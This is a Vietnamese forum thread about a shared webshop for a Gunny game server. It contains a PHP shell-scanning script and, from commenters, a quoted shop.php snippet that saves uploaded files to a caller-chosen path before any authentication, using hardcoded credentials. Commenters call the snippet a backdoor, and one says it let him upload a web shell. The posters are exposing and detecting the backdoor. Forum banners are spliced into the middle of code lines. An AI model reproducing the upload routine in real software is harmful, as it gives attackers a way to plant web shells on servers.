Demo ảnh:


<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Chưa kịp làm cái phân trang :D
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Code đã được edit style html, không đụng chạm gì đến code php gốc, không có chức năng gì mới, webshop thì do bachugacon122 code.
Không dám nói là code sạch 100% nhưng mình đã dùng rồi và không gặp sự cố gì nên chắc cũng tầm 96,69% 8-x. Nếu bạn cài theo đúng hướng dẫn mà vẫn bị lỗi hay bạn bị hack web thì mình không chịu trách nhiệm nhé vì mình chỉ edit style không đụng chạm gì đến code
Các bạn muốn dùng thì dùng mình không tiếp gạch đá :D. Riêng mình vẫn thích dùng webshop này hơn :3. Nghe nói webshop của meocon dính lỗi SQli 8-}.
Link download: Không share nữa code không sạch :( Các bạn thông cảm :| (Bảo gồm full code + data + hướng dẫn cài đặt)

Vui lòng click nút "Thanks" để thấy pass giải nén.
pass unrar: trachpro
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Bonus thêm hướng dẫn scan shell trong mọi code và xóa bỏ.
UP lên root rồi chạy cái này tìm theo từ khóa. Phát hiện cái nào truy cập vào cái đó thử trước nếu thấy là shell thì xóa bỏ là xong

<?php

/************************************************** *******
- Tool Scan shell
- Edit by : GraceH
************************************************** ********/
error_reporting (0); // Mở báo lỗi
ini_set("memory_limit","2000M");
ini_set("safe_mode","off");
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if (!$safe_mode)
set_time_limit(0);
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
?>
<html>
<head>
<meta <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>"content-type" content="text/html; charset=utf-8" />
<title>Scan Shell</title>
<style>
body {
font-family:arial;
}
</style>
</head>
<body bgcolor=black text=blue size=2><center>
<form method='post' action=''>
<div style="border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px">
<h1>Scan Shell - v1.1</h1>
<div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Folder: <input type='text' size=70 name='folder' value='<?echo $_SERVER['DOCUMENT_ROOT']?>/'/></div>
&nbsp;<div>&nbsp; KeyWord:&nbsp; <input type='text' size=70 name='key' value='base64_decode'/></div>
<p><input type='submit' name='submit' value='Tìm kiếm' /></p> </div>
<div align=left><br>Step 1: Nhập đường dẫn thư mục cần scan</div>
<div align=left>Step 2: Nhập từ khóa cần tìm</div>
</form>

<br><br>
---------------------------------------------------------------------------------
</br>GraceH<br>---------------------------------------------------------------------------------
</center>

</body>
</html>
<?
}
else
{
if ($_POST['folder']) $folder = $_POST['folder']; else $folder = $_SERVER['DOCUMENT_ROOT'];
define('Keyword',$_POST['key']); // Tìm kiếm từ khóa
define('TAB',"&nbsp;&nbsp;&nbsp;&nbsp;");
define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls gz txt"); // Không tìm những file
define("MAX_SIZE",1024*1024*1024); // Size tối đa
define("IGNORE_BEFORE", strtotime('2009-08-01') ); // Tìm File trước ngày
$shell = $_SERVER["PHP_SELF"];

function findexts($filename)
{
$filename = strtolower($filename) ;
$exts = split("[/\\.]", $filename) ;
$n = count($exts)-1;
$exts = $exts[$n];
return strtolower($exts);
}

function check_dir($directory,$level) {
global $virus_detected, $all, $detect_errors_only, $detected_Keyword_in_test_script;

$indent='';
for ($count=0;$count<$level;$count++) {
$indent.=TAB;
}
$level++;
$read_dir=opendir($directory); // Mở thư mục hiện tại
while ($file=readdir($read_dir)) {
$filepath=$directory.'/'.$file;
if ($detect_errors_only && $virus_detected) {
exit;
}
if (is_dir($filepath)) {
// Thư mục
if ( ($file<>'.') && ($file<>'..') ) {
check_dir($filepath,$level);
}
}
else {
if (is_file($filepath)) {
// Tập
if ( (is_readable($filepath) ) && (!stristr(IGNORE_EXTENSIONS, findexts($file))) ) {
if ((filesize($filepath)< MAX_SIZE) && (filemtime($filepath)>IGNORE_BEFORE) ){
$fileentry=$directory.'/'.$file.' - '.date('j F Y H:i',filemtime($filepath));
$filestring=file_get_contents($filepath);
$found=stripos($filestring,Keyword); // PHP 5 ONLY
$found=stristr($filestring,Keyword);flush();
if ($found==false) {
if ( (!$detect_errors_only) && (!$all) ) {
echo($filepath.' <font color=#FFFFFF>OK</font><br/>');
}
}
else {
if ($file=='scan_file.php'){
$detected_Keyword_in_test_script=true;
}
else {
$virus_detected=true;
if ($detect_errors_only) {
echo('<b style="color:#F00">Tập tin đề nghị phát hiện</b><br/>');
}
else {
echo(TAB.'<b style="color:#F00">'.$fileentry.'</b> - <b style="color:#FFFFF0">Phát hiện</b><br/>');
}
}
}
$found='';
}
else {
if ( (!$detect_errors_only) && (!$all) ) {
echo($filepath.' <b style="color:yellow">NOT CHECKED - File quá lớn</b><br/>');
}
}
}
else {
if ( (!$detect_errors_only) && (!$all) ) {
echo($filepath.' <b style="color:yellow">NOT CHECKED - Không thuộc kiểu tìm kiếm</b><br/>');
}
}
}
else {
}
}
}
closedir($read_dir);
}

$virus_detected=false;
$all=true;
$detect_errors_only=false;
$detected_Keyword_in_test_script=false;
if (isset($_GET['all'])) {
$all=false;
}
if (isset($_GET['detect_errors_only'])) {
$detect_errors_only=true;
}

echo<<<END1
<html>
<head>
<title>Scan Shell v1.1</title>
<style>
body {
font-family:arial;
}
</style>
</head>
<body bgcolor=black text=blue size=2>
END1;
?>
<div style="border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px">
<h1>Truy xuất từ khóa "<?echo Keyword?>" trong hệ thống !</h1>
Bỏ qua lỗi file : <font color=yellow><?echo IGNORE_EXTENSIONS?>.</font><br/>
Bỏ qua file vượt quá : <font color=yellow><?echo MAX_SIZE?> bytes.</font><br/>
Tìm kiếm file trước ngày :<font color=yellow> <?echo date('j F Y',IGNORE_BEFORE)?>.</font><br/><br></div>
<br/><br>[<a href="<?echo $shell?>?all">Hiển thị tất cả?</a>]
<br/><br/>&nbsp;<br/>
<?

if ($all) {
echo('<font color=yellow>List File</font><br/>');
}
check_dir($folder,0);



if ($virus_detected) {
echo('<br/><b style="color:#f00">Tìm kiếm thành công!</b><br>&nbsp;<br/>');
}
else {
echo('<br/><b style="color:#f00">Không có file chứa Key Word!</b><br>&nbsp;<br/>');
}

?>
</body>
</html>
<?
}
?>

pass giải nén là gì ?____________

shell99 scan trước khi sài nếu ko muốn đi cả sv

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

shell99 scan trước khi sài nếu ko muốn đi cả sv

vãi shell =))

Check sơ quá thấy có vẻ hình như bị dính ....>:)
Cơ mà máy không cài gun nên không test được =]]
Thím nào chuột bạch đê =]]

Ừ, hình như không có shell đâu , nhưng có cái này , thớt giải thích nhé
File shop.php


if($_REQUEST['do']=='upanh')
{
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>Upload ảnh thành công</a></h1>";
}
}
echo '<body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path>
<input type="file" name="files"><input type=submit value="Đăng ảnh"></form></body>';
$config['user_upanh'] = 'upanh';
$config['pass_upanh'] = 'upanh';
if ($_SERVER['PHP_AUTH_USER'] != $config['user_upanh'] || $_SERVER['PHP_AUTH_PW'] != $config['pass_upanh']){
header('<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> Basic realm="Xin vui long khai bao thong tin yeu cau truoc khi thuc hien upload anh!"');
header('<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> 401 Unauthorized');
echo '<center>Access Denied!!!</center>';
exit;
}
exit("");
}

Cái đoạn này có tác dụng gì vậy thớt ? Upload avatar cho user à

Tôi cũng thấy cái đó =]], Cơ mà code không check chiết gì hết, úp shell chắc là được =]]
Chưa có server để test nên chưa nói :))

Ừ, hình như không có shell đâu , nhưng có cái này , thớt giải thích nhé
File shop.php


if($_REQUEST['do']=='upanh')
{
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>Upload ảnh thành công</a></h1>";
}
}
echo '<body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path>
<input type="file" name="files"><input type=submit value="Đăng ảnh"></form></body>';
$config['user_upanh'] = 'upanh';
$config['pass_upanh'] = 'upanh';
if ($_SERVER['PHP_AUTH_USER'] != $config['user_upanh'] || $_SERVER['PHP_AUTH_PW'] != $config['pass_upanh']){
header('<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> Basic realm="Xin vui long khai bao thong tin yeu cau truoc khi thuc hien upload anh!"');
header('<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> 401 Unauthorized');
echo '<center>Access Denied!!!</center>';
exit;
}
exit("");
}

Cái đoạn này có tác dụng gì vậy thớt ? Upload avatar cho user à

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Đoạn mã này có thể là để up ảnh hay gì đó, nhưng trong này không check exetension của file upload lên nên hoàn toàn có thể dùng để upload shell ==> Thành mã độc rồi đấy

Bạn share website ra không kiểm tra à ?

P/S: Đã test cái code upload trên nhé, up shell ngon lành cành đào

Mình có nói rõ ở topic ai biết đọc sẽ hiểu :)

web này shell vãi loàn nhé

con shell 99 ở trong đoạn code /lib/nusoap.php

đắng lòng vl kis còn chém chết 3 lần :(

ở bản gốc file này sạch qua tay bố này thành shell cmn luôn

lại còn úp ảnh avatar cho member login sv game thì thuâ

thôi cho ra đảo đi

Thanh niên 2k14 kiếm ăn bằng cách gửi shell :(

Đúng, có thể bạn chỉ edit html thôi !

Nhưng trước khi share thì bạn nên check lại cái web xem nó có mã độc gì hay không chứ !
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

bạn nói như b tớ ấy

Bạn đã share thì share cho đàng hoàn

chứ đừng nói kiểu cho member check lỗ hổng code :|

làm người ai lại đi đánh đó người ta vậy

webshop mẹ gì vào file trống trơn

Qua server mu online mà học tập nhé, người ta share cả 1 bộ code đến vài trăm file mà ko như này đâu

web này shell vãi loàn nhé

con shell 99 ở trong đoạn code /lib/nusoap.php

đắng lòng vl kis còn chém chết 3 lần :(

ở bản gốc file này sạch qua tay bố này thành shell cmn luôn

lại còn úp ảnh avatar cho member login sv game thì thuâ

thôi cho ra đảo đi

Thanh niên 2k14 kiếm ăn bằng cách gửi shell :(
Vãi bác download cái file mới up lại chưa :| phán như thánh.

--- Chế độ gộp bài viết ---


bạn nói như b tớ ấy

Bạn đã share thì share cho đàng hoàn

chứ đừng nói kiểu cho member check lỗ hổng code :|

làm người ai lại đi đánh đó người ta vậy

webshop mẹ gì vào file trống trơn

Qua server mu online mà học tập nhé, người ta share cả 1 bộ code đến vài trăm file mà ko như này đâu

MU qua mà phán như thánh hỏi mấy member ở box gunny xem code đấy đủ dùng chưa :S
Không muốn chửi bác là "ngu" nhưng......

Vãi bác download cái file mới up lại chưa :| phán như thánh.

--- Chế độ gộp bài viết ---



MU qua mà phán như thánh hỏi mấy member ở box gunny xem code đấy đủ dùng chưa :S
Không muốn chửi bác là "ngu" nhưng......

bác ngu thì im mẹ đi

tôi ở cái box mu 3 năm tôi biết nhé

box mu người ta share full code server

3 năm nay trừ cái web tvweb thiếu vân là có lỗ hỏng còn đâu code mu luôn ngon nhé

ko biết thì tốt nhất là nên im :-|

vào đây rồi phát biểu nhé <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

bác ngu thì im mẹ đi

tôi ở cái box mu 3 năm tôi biết nhé

box mu người ta share full code server

3 năm nay trừ cái web tvweb thiếu vân là có lỗ hỏng còn đâu code mu luôn ngon nhé

ko biết thì tốt nhất là nên im :-|
Sax. Yêu cầu bạn đọc lại trước khi chửi :| không hiểu à :S

Sax. Yêu cầu bạn đọc lại trước khi chửi :| không hiểu à :S


khi rip skin web thì tôi cũng hiểu chủ yếu các file cần thiết

chứ ko phải bê cả 1 lỗ hỏng úp lên

còn tôi khẳng cmn luôn 100% là bác share shell

hoặc bác dc thằng nào share mà ko biết web có shell hay ko

chấm hết nhé ! còn bác biết rip web mà nói ko biết có shell thì hài vãi đái

bác có thể chửi anh em clb ok nhưng việc share shell là cực kỳ tai hại

khi rip skin web thì tôi cũng hiểu chủ yếu các file cần thiết

chứ ko phải bê cả 1 lỗ hỏng úp lên

còn tôi khẳng cmn luôn 100% là bác share shell

hoặc bác dc thằng nào share mà ko biết web có shell hay ko

chấm hết nhé ! còn bác biết rip web mà nói ko biết có shell thì hài vãi đái

bác có thể chửi anh em clb ok nhưng việc share shell là cực kỳ tai hại

Có lẽ bạn không hiểu vấn đề rồi. Từ từ đọc và suy gẫm nhé để mình giải thích:
Ý bạn muonline2012 nói code mình share thiếu vì thấy ít file. Và nói là MU nhiều file là full đầy đủ. Nhưng thực chất webshop gunny chỉ cần vậy là đủ không như MU. Hiểu chưa :))

nói chúng là cứ dùng webshop gunny II của ông chaukhanh là an toàn =)) ko thì tự code lấy mà dùng :))

may quá web mình share ko biết có con shell nào ko nhỉ #-o

khi rip skin web thì tôi cũng hiểu chủ yếu các file cần thiết

chứ ko phải bê cả 1 lỗ hỏng úp lên

còn tôi khẳng cmn luôn 100% là bác share shell

hoặc bác dc thằng nào share mà ko biết web có shell hay ko

chấm hết nhé ! còn bác biết rip web mà nói ko biết có shell thì hài vãi đái

bác có thể chửi anh em clb ok nhưng việc share shell là cực kỳ tai hại

Bác ấy share là định chôm sever của người khác ấy mà. nhưng mà sự việc bại lộ rồi. Bác ấy cảm thấy hợi bị nhục rồi. Đúng là hành động xấu[-(

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Bác ấy share là định chôm sever của người khác ấy mà. nhưng mà sự việc bại lộ rồi. Bác ấy cảm thấy hợi bị nhục rồi. Đúng là hành động xấu[-(

Mình không có làm gunny nữa nên chôm chẳng để làm gì. Người khác chôm của mình thì có rồi. Lần sau mình sẽ không share cái gì nữa.Trước giờ mình làm gunny nhưng vẫn không share 1 cái gì. Vì những thằng như bạn, không share thì nói sao ki bo share rồi thì chôm này chôm nọ. Thằng nào có server ngon sao nó lại đi dùng 1 cái webshop cùi. Bạn có suy nghĩ giống 1 thằng "ngu".

Mình không có làm gunny nữa nên chôm chẳng để làm gì. Người khác chôm của mình thì có rồi. Lần sau mình sẽ không share cái gì nữa.Trước giờ mình làm gunny nhưng vẫn không share 1 cái gì. Vì những thằng như bạn, không share thì nói sao ki bo share rồi thì chôm này chôm nọ. Thằng nào có server ngon sao nó lại đi dùng 1 cái webshop cùi. Bạn có suy nghĩ giống 1 thằng "ngu".

Không biết thằng nào nhục áh. Đinh ăm trộm của người khác . nhét tuốt vào trong bộ người khác không phát hiện ah. Bài đặc đưa đoạn code scan Shell định qua mặt ah. Đúng là tên cờ hó

Không biết thằng nào nhục áh. Đinh ăm trộm của người khác . nhét tuốt vào trong bộ người khác không phát hiện ah. Bài đặc đưa đoạn code scan Shell định qua mặt ah. Đúng là tên cờ hó
Bạn có não không :S
30charrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr

Ở đầu topic, chủ thớt đã nói không share nữa rồi.
Mod nào đóng topic đi, để mở làm gì rồi lại gạch đá thêm :|

ọccc .. huọcccc xem...........